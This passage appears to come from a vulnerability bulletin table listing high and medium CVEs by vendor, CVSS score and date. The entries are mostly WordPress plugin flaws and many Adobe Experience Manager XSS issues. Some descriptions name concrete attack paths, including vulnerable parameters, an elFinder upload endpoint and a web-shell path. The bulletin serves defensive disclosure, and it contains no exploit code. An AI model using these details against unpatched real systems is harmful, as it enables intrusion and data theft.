| VMware--VCF operations | VMware Cloud Foundation Operations contains multiple stored cross-site scripting vulnerabilities.A malicious actor with privileges to create policies, views or text-widgets may be able to inject scripts to perform administrative actions in VMware Cloud Foundation Operations. | 2026-06-08 | 8 | CVE-2026-41724 |
| VS Revo--RevoUninstaller | A vulnerability was identified in VS Revo RevoUninstaller 2.5.x/2.6.x. The affected element is the function IOCtl_Handler in the library RevoDetector.sys of the component IOCTL Handler. Such manipulation leads to heap-based buffer overflow. The attack must be carried out locally. The exploit is publicly available and might be used. Upgrading to version 2.7.0 is sufficient to fix this issue. It is recommended to upgrade the affected component. | 2026-06-14 | 7.8 | CVE-2026-12193 |
| WBW Plugins--Product Filter by WBW | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WBW Plugins Product Filter by WBW allows Blind SQL Injection. This issue affects Product Filter by WBW: from n/a through 3.1.2. | 2026-06-11 | 9.3 | CVE-2026-39494 |
| webandprint--Augmented Reality | WordPress Augmented-Reality plugin contains a remote code execution vulnerability in the elFinder connector that allows unauthenticated attackers to upload and execute arbitrary PHP files. Attackers can send POST requests to the connector.minimal.php endpoint with mkfile and put commands to create malicious PHP files in the file_manager directory and execute them on the server. | 2026-06-08 | 7.5 | CVE-2023-54350 |
| WebPros--WordPress-Toolkit | Argument injection vulnerability in WordPress Toolkit before 6.11.0 as used in cPanel & WHM, allows remote authenticated users to bypass cross-tenant authorization and execute arbitrary wp-toolkit CLI commands as another account. | 2026-06-12 | 9.9 | CVE-2026-47365 |
| Wow-Company--Wow Forms | Wow Forms WordPress Plugin version 2.1 contains an SQL injection vulnerability that allows unauthenticated attackers to read arbitrary database information by exploiting an unescaped POST parameter. Attackers can inject SQL code through the 'mwpformid' parameter in requests to the admin-ajax.php endpoint with the 'send_mwp_form' action to extract sensitive database contents. | 2026-06-09 | 8.2 | CVE-2017-20244 |
| Wow-Company--Wow Viral Signups | Wow Viral Signups 2.1 WordPress plugin contains an SQL injection vulnerability that allows unauthenticated attackers to extract database information by exploiting the unescaped 'idsignup' POST parameter. Attackers can send crafted requests to the admin-ajax.php endpoint with malicious SQL payloads in the 'idsignup' parameter to read arbitrary data from the database. | 2026-06-09 | 8.2 | CVE-2017-20245 |
| WP Travel Kit--Travelscape | WordPress Seotheme contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary PHP code by uploading malicious files to the theme directory. Attackers can access the uploaded PHP shell at /wp-content/themes/seotheme/mar.php to execute system commands and upload additional files for persistent access. | 2026-06-08 | 9.8 | CVE-2023-54352 |
| WP Travel Kit--Travelscape | WordPress Theme Travelscape 1.0.3 contains an arbitrary file upload vulnerability that allows unauthenticated attackers to upload malicious files by exploiting insufficient validation in the theme's upload functionality. Attackers can upload arbitrary files to the theme directory and execute them to achieve remote code execution on the affected WordPress installation. | 2026-06-08 | 9.8 | CVE-2024-58349 |
| WPVibes--WP Mail Log | Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in WPVibes WP Mail Log allows DOM-Based XSS. This issue affects WP Mail Log: from n/a through 1.0.2. | 2026-06-11 | 7.1 | CVE-2023-33999 |
| WPZOOM--WPZOOM Portfolio | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPZOOM Portfolio allows Reflected XSS. This issue affects WPZOOM Portfolio: from n/a through 1.4.21. | 2026-06-10 | 7.1 | CVE-2026-49069 |
| xibosignage--xibo-cms | Xibo is an open source digital signage platform with a web content management system and Windows display player software. Prior to 4.4.2, a vulnerability chain consisting of Stored XSS and Iframe Sandbox escape in the Xibo CMS allows users with DataSet permissions to use the Data Connector functionality to craft messages which escape the sandbox and facilitate XSS. Exploitation of the vulnerability is possible on behalf of an authorized user who has both of the following privileges, which are not granted to non-admins as standard: Include "Add DataSet" button to allow for additional DataSets to be created independently to Layouts Users should upgrade to version 4.4.2 which fixes this issue. Upgrading to a fixed version is necessary to remediate. Users unable to upgrade should revoke such privileges from users they do not trust. | 2026-06-10 | 7.6 | CVE-2026-42558 |
| Yarbo--Yarbo Android/IOS mobile application | The Yarbo Android and iOS applications contain hard-coded MQTT broker credentials that are identical for all users and all devices. These credentials are embedded in the application binary and are readily extractable via APK decompilation. The credentials provide access to cloud MQTT brokers carrying real-time telemetry for the entire global Yarbo robot fleet. They allow both wildcard subscription to all robot telemetry topics and publishing to any robot's command topic using only the robot's serial number. | 2026-06-12 | 9.8 | CVE-2026-10557 |
| Yarbo--Yarbo Android/IOS mobile application | The Yarbo cloud does not enforce per-device or per-user authorization. Any client possessing valid credentials, whether the shared hard-coded credentials or legitimate per-user credentials, can subscribe to wildcard topics covering all robots globally, and can publish to any robot's command topic using only the robot's serial number (disclosed in the telemetry stream). Even after removal of hard-coded credentials from the app, a single compromised credential could still provide fleet-wide access without per-device access controls. | 2026-06-12 | 8.1 | CVE-2026-7368 |
| YesWiki--yeswiki | YesWiki is a wiki system written in PHP. Prior to version 4.6.6, an unsafe execution vulnerability exists in the Bazar form field calculator (CalcField.php) of YesWiki. The application attempts to sanitize user-defined mathematical formulas using a complex recursive regular expression before passing them to the PHP eval() function. This implementation is inherently flawed: it is vulnerable to Regular Expression Denial of Service (ReDoS / Stack Overflow) which can crash the server, and it creates a high-risk architecture where any logic bypass directly results in arbitrary PHP code execution. Version 4.6.6 patches the issue. | 2026-06-08 | 9.8 | CVE-2026-52778 |
| zephyrproject-rtos--Zephyr | A remote, unauthenticated attacker can trigger memory corruption in Zephyr's HTTP server WebSocket upgrade path by sending a crafted Sec-WebSocket-Key header. The HTTP/1 header parser copies the header into a fixed-size buffer using a bounded copy that does not guarantee NUL termination when the input length reaches the buffer size. During upgrade handling the buffer is copied to a local stack buffer and passed to strlen(); if no NUL exists in-bounds, strlen() reads beyond the stack buffer and subsequent concatenation with the WebSocket magic string can write out of bounds. This leads to out-of-bounds read and write on stack memory, resulting in crash (denial of service) and potentially code execution. The path is reachable when CONFIG_HTTP_SERVER_WEBSOCKET is enabled. | 2026-06-09 | 9.8 | CVE-2026-5067 |
| zephyrproject-rtos--Zephyr | A remote, unauthenticated BLE peer can trigger a 2-byte out-of-bounds write in the Bluetooth host during L2CAP LE CoC SDU reassembly. When the application enables segmentation (via chan_ops.alloc_buf) and the chosen RX pool has a user_data_size smaller than 2 bytes, the segmentation counter stored in the net_buf user_data area is written out of bounds in l2cap_chan_le_recv_seg (subsys/bluetooth/host/l2cap.c). The observed effects are an AddressSanitizer abort and, without ASan, heap corruption / fatal error. | 2026-06-09 | 7.6 | CVE-2026-5068 |
| Zoom Communications--Remote Control for Zoom Contact Center | Insufficient Verification of Data Authenticity in Remote Control for Zoom Contact Center for Windows before version 7.0.0 may allow an authenticated user to enable an escalation of privilege via local access. | 2026-06-12 | 7.8 | CVE-2026-53406 |
| Zoom Communications--Zoom Workplace | Improper Authorization in Handler for Custom URL Scheme in Zoom Workplace before version 7.0.4 for Android and before 7.0.3 for iOS may allow an unauthenticated user to conduct an escalation of privilege via network access. | 2026-06-12 | 8.1 | CVE-2026-53407 |
| Zoom Communications--Zoom Workplace | Improper Authorization in Handler for Custom URL Scheme in Zoom Workplace before version 7.0.4 for Android and before 7.0.3 for iOS may allow an unauthenticated user to conduct an escalation of privilege via network access. | 2026-06-12 | 8.1 | CVE-2026-53408 |
Medium Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 100plugins--Open User Map PRO | The Open User Map PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'oum_location_notification' parameter in versions up to, and including, 1.4.31 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-11 | 4.7 | CVE-2026-2827 |
| 2winfactor--Presto Player | The Presto Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link_url' parameter of the [presto_player_overlay] shortcode in versions up to, and including, 4.2.0 This is due to insufficient input sanitization and output escaping in the getOverlays() function, which copies the link_url shortcode attribute directly into the overlay configuration without scheme validation, allowing javascript: URIs to survive and be rendered as the href of a clickable anchor element by the presto-dynamic-overlay-ui web component. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-12 | 6.4 | CVE-2026-9125 |
| 360crest--TinyMCE shortcode Addon | The TinyMCE shortcode Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'btnrel' Shortcode Attribute in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-09 | 6.4 | CVE-2026-10024 |
| ABB--Freelance | Authentication bypass by primary weakness vulnerability in ABB Freelance. This issue affects Freelance: through 2013, 2013 SP1, 2016, 2016 SP1, 2019, 2019 SP1, 2019 SP1 FP1, 2024. | 2026-06-11 | 6.6 | CVE-2025-7064 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 5.5 | CVE-2026-47923 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 5.5 | CVE-2026-47924 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in an application denial-of-service. An attacker could exploit this vulnerability to crash the application, leading to a denial-of-service condition. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 5.5 | CVE-2026-47925 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 5.5 | CVE-2026-47926 |
| Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30365, 26.001.21651 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-06-09 | 5.5 | CVE-2026-47961 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-34692 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47935 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47936 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47939 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47941 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47942 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47943 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47944 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47945 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47946 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47947 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47948 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47949 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47950 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47951 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47953 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47954 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47956 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47957 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47958 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47962 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47966 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47970 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47972 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47973 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47974 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47975 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47977 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47978 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47980 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47981 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47982 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47983 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47985 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47986 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47987 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47989 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47990 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-47993 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48250 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48251 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48256 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48258 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48264 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48265 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48266 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48268 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48271 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48280 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48297 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed. | 2026-06-09 | 5.4 | CVE-2026-48299 |
